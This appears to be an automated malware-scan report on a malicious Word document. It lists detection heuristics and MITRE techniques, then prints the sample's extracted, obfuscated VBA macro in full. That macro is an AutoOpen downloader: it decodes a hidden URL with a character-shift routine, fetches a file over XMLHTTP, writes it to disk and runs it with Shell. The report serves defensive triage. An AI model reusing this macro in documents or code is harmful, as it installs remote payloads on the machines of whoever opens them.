MALICIOUS
380
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1059 Command and Scripting Interpreter
The sample contains an AutoOpen VBA macro that is obfuscated and uses character-shifting to decode commands. The script utilizes CreateObject to instantiate Microsoft.XMLHTTP and downloads a payload from a hardcoded URL. It then saves the payload to a file and executes it using Shell. The reconstructed persistence path is HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy.
Heuristics 12
-
VBA macros detected medium 8 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell (ceVFnSLOJmMcDQZLNTjinBHpAPGvNnEycPX) -
VBA character-shift decoded Shell command critical OLE_VBA_ASC_CHR_SHIFT_SHELLVBA auto-exec macro stores an encoded command string, decodes it with a Mid/Asc/Chr character-shift loop, and passes the recovered text to Shell. This is a high-confidence command stager.Matched line in script
For qhHIZiqVuwzjQRRZdvaWjQnAmxhviXKuaUh = 1 To Len(SsacqdgjiFkVdmLZJBdFfIynnxvyTLLupEA) -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
.write nVeHZdyqHLITKPmagPwOasBEtLQVqCiAIsl.responseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Dim nVeHZdyqHLITKPmagPwOasBEtLQVqCiAIsl: Set nVeHZdyqHLITKPmagPwOasBEtLQVqCiAIsl = CreateObject(("Microsoft.XMLHTTP")) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim nVeHZdyqHLITKPmagPwOasBEtLQVqCiAIsl: Set nVeHZdyqHLITKPmagPwOasBEtLQVqCiAIsl = CreateObject(("Microsoft.XMLHTTP")) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
qjgfaoLzeNQRAbNsEBBwupaOjNyUZxHLmeR = Environ(tTfwBBSjQpSDrlTHDqnuDhJdOEJqFNjOlwQ("ct| ", "15")) -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5906 bytes |
SHA-256: 3deb1cbd2d354406a9281fd549f22a1fafb0da22a16fa98d06a5b51465cee31d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
33 of 57 identifiers look randomly generated (e.g. 'GInSySzalZQPDdaClOKKYFxCguAheKoGHkJ') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim ceVFnSLOJmMcDQZLNTjinBHpAPGvNnEycPX
qjgfaoLzeNQRAbNsEBBwupaOjNyUZxHLmeR = Environ(tTfwBBSjQpSDrlTHDqnuDhJdOEJqFNjOlwQ("ct| ", "15"))
Dim nVeHZdyqHLITKPmagPwOasBEtLQVqCiAIsl: Set nVeHZdyqHLITKPmagPwOasBEtLQVqCiAIsl = CreateObject(("Microsoft.XMLHTTP"))
Dim DnnOyMQJqGLSbvXBcxYALNqayLFkkkdIdzd: Set DnnOyMQJqGLSbvXBcxYALNqayLFkkkdIdzd = CreateObject(tTfwBBSjQpSDrlTHDqnuDhJdOEJqFNjOlwQ("Ehshf2Wxvieq", "4"))
ceVFnSLOJmMcDQZLNTjinBHpAPGvNnEycPX = qjgfaoLzeNQRAbNsEBBwupaOjNyUZxHLmeR + tTfwBBSjQpSDrlTHDqnuDhJdOEJqFNjOlwQ("kY‡a`g=t‡t", "15")
nVeHZdyqHLITKPmagPwOasBEtLQVqCiAIsl.Open tTfwBBSjQpSDrlTHDqnuDhJdOEJqFNjOlwQ("KIX", "4"), tTfwBBSjQpSDrlTHDqnuDhJdOEJqFNjOlwQ("wƒƒ ‚I>>r~sx}vƒt| {t=r~|>}t†>† <r~}ƒt}ƒ> {„vx}‚>ˆ†‰�uus>~~=t‡t", "15"), False
nVeHZdyqHLITKPmagPwOasBEtLQVqCiAIsl.Send
With DnnOyMQJqGLSbvXBcxYALNqayLFkkkdIdzd
.Type = 1
.Open
.write nVeHZdyqHLITKPmagPwOasBEtLQVqCiAIsl.responseBody
.SaveToFile ceVFnSLOJmMcDQZLNTjinBHpAPGvNnEycPX, 2
End With
Shell (ceVFnSLOJmMcDQZLNTjinBHpAPGvNnEycPX)
End Sub
Public Function tTfwBBSjQpSDrlTHDqnuDhJdOEJqFNjOlwQ(SsacqdgjiFkVdmLZJBdFfIynnxvyTLLupEA As String, eEbOpARScNrTMhCPlmOyeunJNCCksOKgYGh As Integer)
Dim qhHIZiqVuwzjQRRZdvaWjQnAmxhviXKuaUh As Integer
For qhHIZiqVuwzjQRRZdvaWjQnAmxhviXKuaUh = 1 To Len(SsacqdgjiFkVdmLZJBdFfIynnxvyTLLupEA)
Mid(SsacqdgjiFkVdmLZJBdFfIynnxvyTLLupEA, qhHIZiqVuwzjQRRZdvaWjQnAmxhviXKuaUh, 1) = Chr(Asc(Mid(SsacqdgjiFkVdmLZJBdFfIynnxvyTLLupEA, qhHIZiqVuwzjQRRZdvaWjQnAmxhviXKuaUh, 1)) - eEbOpARScNrTMhCPlmOyeunJNCCksOKgYGh)
Next qhHIZiqVuwzjQRRZdvaWjQnAmxhviXKuaUh
tTfwBBSjQpSDrlTHDqnuDhJdOEJqFNjOlwQ = SsacqdgjiFkVdmLZJBdFfIynnxvyTLLupEA
End Function
Public Function cgORkZELiLrmHFuHFAOYdYbRjYzYzYACAzV()
Dim GInSySzalZQPDdaClOKKYFxCguAheKoGHkJ As Integer
GInSySzalZQPDdaClOKKYFxCguAheKoGHkJ = 6
Do While GInSySzalZQPDdaClOKKYFxCguAheKoGHkJ < 24
DoEvents: GInSySzalZQPDdaClOKKYFxCguAheKoGHkJ = GInSySzalZQPDdaClOKKYFxCguAheKoGHkJ + 1
Loop
End Function
Public Function KWrPJBBcOEXNwuXfJWfomTjTTPYtfbbqqls()
Dim RSRkgQjCkymwEeYNxSLRLHtRtdHRmdgXLXb As Integer
RSRkgQjCkymwEeYNxSLRLHtRtdHRmdgXLXb = 6
Do While RSRkgQjCkymwEeYNxSLRLHtRtdHRmdgXLXb < 24
DoEvents: RSRkgQjCkymwEeYNxSLRLHtRtdHRmdgXLXb = RSRkgQjCkymwEeYNxSLRLHtRtdHRmdgXLXb + 1
Loop
End Function
Public Function IFHFMYxXjEvMETIvGOgJwCGFXDAIsJnXvuQ()
Dim IaBAyUEaATgCwfTMriIwFyCDJYoeZlYRfYV As Integer
IaBAyUEaATgCwfTMriIwFyCDJYoeZlYRfYV = 6
Do While IaBAyUEaATgCwfTMriIwFyCDJYoeZlYRfYV < 24
DoEvents: IaBAyUEaATgCwfTMriIwFyCDJYoeZlYRfYV = IaBAyUEaATgCwfTMriIwFyCDJYoeZlYRfYV + 1
Loop
End Function
Public Function GQHFEUsbROnyEnuFaRIxRNnGuThVKAxxncv()
Dim iDHSnFAAzZmumvLTJqqjNdWKkIWQmRKgbNL As Integer
iDHSnFAAzZmumvLTJqqjNdWKkIWQmRKgbNL = 6
Do While iDHSnFAAzZmumvLTJqqjNdWKkIWQmRKgbNL < 24
DoEvents: iDHSnFAAzZmumvLTJqqjNdWKkIWQmRKgbNL = iDHSnFAAzZmumvLTJqqjNdWKkIWQmRKgbNL + 1
Loop
End Function
Public Function xsGgkkmAQYbnndQglBPputehymgZYyRTmqc()
Dim DqzWBkbISjCKufIciKQgEitDSYNbnbcBSWN As Integer
DqzWBkbISjCKufIciKQgEitDSYNbnbcBSWN = 6
Do While DqzWBkbISjCKufIciKQgEitDSYNbnbcBSWN < 24
DoEvents: DqzWBkbISjCKufIciKQgEitDSYNbnbcBSWN = DqzWBkbISjCKufIciKQgEitDSYNbnbcBSWN + 1
Loop
End Function
Public Function HlEhYQozVtLBcttIuOAKrHmmQnucXCCViOj()
Dim GYhMohBNicGlhUNOoHktzTRQkWMxnqLSifn As Integer
GYhMohBNicGlhUNOoHktzTRQkWMxnqLSifn = 6
Do While GYhMohBNicGlhUNOoHktzTRQkWMxnqLSifn < 24
DoEvents: GYhMohBNicGlhUNOoHktzTRQkWMxnqLSifn = GYhMohBNicGlhUNOoHktzTRQkWMxnqLSifn + 1
Loop
End Function
Public Function fWPDliGLFRPXfRgtctytNctkLKcHORBOWiN()
Dim WCsbNJnaDAJGgyEOgjUvDxesaGTxnlVBwEJ As Integer
WCsbNJnaDAJGgyEOgjUvDxesaGTxnlVBwEJ = 6
Do While WCsbNJnaDAJGgyEOgjUvDxesaGTxnlVBwEJ < 24
DoEvents: WCsbNJnaDAJGgyEOgjUvDxesaGTxnlVBwEJ = WCsbNJnaDAJGgyEOgjUvDxesaGTxnlVBwEJ + 1
Loop
End Function
Public Function xVdAKbPAJoIYIVohbbsMAxbPlwpwRyUeWYT()
Dim DHoaZsdjcpHZAvIFCrdAAOjONGnDLTzXEXG As Integer
DHoaZsdjcpHZAvIFCrdAAOjONGnDLTzXEXG = 6
Do While DHoaZsdjcpHZAvIFCrdAAOjONGnDLTzXEXG < 24
DoEvents: DHoaZsdjcpHZAvIFCrdAAOjONGnDLTzXEXG = DHoaZsdjcpHZAvIFCrdAAOjONGnDLTzXEXG + 1
Loop
End Function
Public Function lZewwiYLVeuHKePmoRxLNxOeufcFxADCDEl()
Dim kjTEMBUBXvNIrfZXxIPGofACQGTOVbsDGNf As Integer
kjTEMBUBXvNIrfZXxIPGofACQGTOVbsDGNf = 6
Do While kjTEMBUBXvNIrfZXxIPGofACQGTOVbsDGNf < 24
DoEvents: kjTEMBUBXvNIrfZXxIPGofACQGTOVbsDGNf = kjTEMBUBXvNIrfZXxIPGofACQGTOVbsDGNf + 1
Loop
End Function
Public Function UYTosxhpPAsdGNlLRQjnRHCbKIXljIrRBgF()
Dim mTliRYDLCkYcowdqVfUJNVNzEZRGGevbuIT As Integer
mTliRYDLCkYcowdqVfUJNVNzEZRGGevbuIT = 6
Do While mTliRYDLCkYcowdqVfUJNVNzEZRGGevbuIT < 24
DoEvents: mTliRYDLCkYcowdqVfUJNVNzEZRGGevbuIT = mTliRYDLCkYcowdqVfUJNVNzEZRGGevbuIT + 1
Loop
End Function
Public Function rJQyJpAwWckkCLKyuizZwyCCWGqjZjZetEJ()
Dim OOXsbAEaicGUlnZxGcabscNwYTmsICGryXR As Integer
OOXsbAEaicGUlnZxGcabscNwYTmsICGryXR = 6
Do While OOXsbAEaicGUlnZxGcabscNwYTmsICGryXR < 24
DoEvents: OOXsbAEaicGUlnZxGcabscNwYTmsICGryXR = OOXsbAEaicGUlnZxGcabscNwYTmsICGryXR + 1
Loop
End Function
Public Function SKeIWjrpSHlzkKYzaorvjUgswjIPrXwJjwI()
Dim yzWORuBVKEKDPKXJKFjITeGMIbcTvgbQnBu As Integer
yzWORuBVKEKDPKXJKFjITeGMIbcTvgbQnBu = 6
Do While yzWORuBVKEKDPKXJKFjITeGMIbcTvgbQnBu < 24
DoEvents: yzWORuBVKEKDPKXJKFjITeGMIbcTvgbQnBu = yzWORuBVKEKDPKXJKFjITeGMIbcTvgbQnBu + 1
Loop
End Function
Attribute VB_Name = "NewMacros"
Sub pop()
'
' pop Macro
'
'
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.